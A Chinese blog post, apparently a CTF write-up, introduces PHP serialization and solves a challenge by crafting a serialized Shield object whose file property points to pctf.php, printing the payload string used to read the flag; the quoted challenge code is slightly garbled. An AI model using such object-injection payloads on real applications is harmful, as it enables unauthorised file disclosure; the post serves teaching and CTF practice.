PHP的反序列化

最新推荐文章于 2024-05-20 17:29:49 发布
最新推荐文章于 2024-05-20 17:29:49 发布
阅读量1.4k 收藏 4
点赞数 4
分类专栏: CTF WriteUp web 文章标签: php反序列化 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CliffordR/article/details/82975189
版权

什么是反序列化?
  在我们讲PHP反序列化的时候,基本都是围绕着serialize(),unserialize()这两个函数。那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。举个例子,不知道大家知不知道json格式,这就是一种序列化,有可能就是通过array序列化而来的。而反序列化就是把那串可以传输的字符串再变回对象。

反序列化中的解释:

在这里插入图片描述

拿一个神盾局的秘密来实验一下php的反序列化

拿到题目源码:

<?php
	//flag is in pctf.php
	class Shield {
		public $file;
		function __construct($filename = '') {
			$this -> file = $filena		}
		function readfile() {
			if (!empty($this->file) && stripos($this->file,'..')===FALSE  
			&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
				return @file_get_contents($this->file);
			}
		}
	}
?>

代码审计可知需要用到反序列化,并且flag在pctf.php中
解反序列化脚本:

<?php
	class Shield {
		public $file = "pctf.php";
	}
	$chybeta = new Shield();
	print_r(serialize($chybeta));
?>

得到反序列化字符串:O:6:“Shield”:1:{s:4:“file”;s:8:“pctf.php”;}
此处可以口算也可以用脚本跑。
在这里插入图片描述

D-R0s1
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP序列
2ed
10-30 331
文章简介:# PHP序列学习笔记。 目录:# 序列序列 相关函数 1. serialize()函数 2 .unserialize()函数 序列的不同结果 例题:D0g3CTF 总结 参考文献 序列序列# 说到序列,就不得不说序列序列:把对象、数组、字符串等转为字节序列的过程称为序列 序列:把字节序列恢复为对象、数组、字符串...
PHP序列序列
qq_31088019的博客
08-25 4135
PHP序列序列及案例
php序列原理
最新发布
byll1024的博客
05-20 1009
PHP序列是将经过序列的字符串恢复成原始数据结构的过程。序列是指将复杂数据结构(如数组、对象)转换为可存储或传输的字符串形式,而序列则是将这些字符串重新转换回原来的数据结构。在PHP中,这通常通过`unserialize()`函数实现。这个函数读取序列字符串,并根据其中包含的信息重建原始的数据结构。需要注意的是,序列过程可能会执行字符串中包含的代码,因此存在安全风险。为了避免潜在的安全隐患,建议只对可信的序列字符串进行序列操作。
PHP的序列序列
一颗小白菜的博客
08-17 541
PHP程序执行结束以后会将文件中的变量和内容释放掉, 如果一个程序想要的调用之前程序的变量,但是之前的程序已经执行完毕,所有的变量和内容都被释放,那该如何操作呢?这时候就可以通过序列序列保存程序中的对象,给其他程序使用。php序列可以将对象转换成字符串,但只序列属性,不序列方法。unserialize()函数的变量可控,php文件中存在可利用的类,类中有魔法函数。[网鼎杯 2020 青龙组]AreUSerialz(BUUCTF)​PHP序列序列函数达到序列序列的目的。...
十、pikachu之php序列
qq_55202378的博客
08-24 942
pikachu php序列
详解php序列
12-17
最近也是在复习之前学过的内容,感觉对PHP序列的理解更加深了,所以在此总结一下 2 serialize()函数  “所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。序列一个对象将会...
php序列例题.docx
07-18
PHP 序列详解 PHP 序列是指将序列的数据重新转换为 PHP 对象或数组的过程。PHP 提供了两个用于序列序列的函数:`serialize()` 和 `unserialize()`。在本文中,我们将详细介绍 PHP 序列的过程...
浅析PHP序列中过滤函数使用不当导致的对象注入问题
12-20
#### 正常的序列语句是这样的 $a=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”abcdef”;}’; 但是如果写成这样 $b=’a:2:{s:8:”username”;s:7:”dimpl3s”;s:8:”password”;s:6:”...
serialize-like-php:使用javascript模拟php序列序列功能
05-21
PHP序列 模拟用于序列序列php函数。 对于使用(或迁移!)php应用程序很有帮助。 学分 我只是将其打包并添加了测试。 这些是写这些内容的人: 连载: discuss at: http://phpjs.org/functions/serialize/ original by: Arpad Ray (mailto:arpad@php.net) improved by: Dino improved by: Le Torbi (http://www.letorbi.de/) improved by: Kevin van Zonneveld (http://kevin.vanzonneveld.net/) bugfixed by: Andrej Pavlovic bugfixed by: Garagoth bugfixed by: Russell Walker (http:
PHP常见的序列序列操作实例分析
10-16
PHP编程中,序列序列是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
序列序列PHP
m0_61869253的博客
08-23 85
序列:把对象转换为字节序列的过程称为对象的序列序列:把字节序列恢复为对象的过程称为对象的序列。对象的持久(将对象内容保存到数据库或文件中)远程数据传输(将对象发送给其他计算机系统)序列序列主要解决的是数据的一致性问题。简单来说,就是输入数据与输出数据是一样的。对于数据的本地持久,只需要将数据转换为字符串进行保存即可是实现,但对于远程的数据传输,由于操作系统,硬件等差异,会出现内存大小端,内存对齐等问题,导致接收端无法正确解析数据,为了解决这种问题。
手把手教你PHP序列漏洞
qq_62099202的博客
08-08 1406
什么是序列 序列是将变量转换为可保存或传输的字符串的过程 序列就是在适当的时候把这个字符串再转成原来的变量使用 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性 简单来说就是将一大段对象压缩成字符串 例如,可以序列一个对象,然后使用 HTTP 通过 Internet 在客户端和服务器之间传输该对象,或者和其它应用程序共享使用。之,序列根据流重新构造对象
(37)【PHP序列PHP序列原理、函数、利用过程
04-17 3649
【专题】PHP序列利用
PHP序列序列
dydydt的博客
07-11 905
序列序列
php序列序列
qq_63501912的博客
02-07 1134
php序列序列
php序列
05-24
PHP序列是指将序列的数据还原为对象或数组的过程。在PHP中,我们可以使用序列序列来实现对象的持久,即将对象保存到文件或数据库中,并在需要时还原为对象。序列可以通过unserialize()函数来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值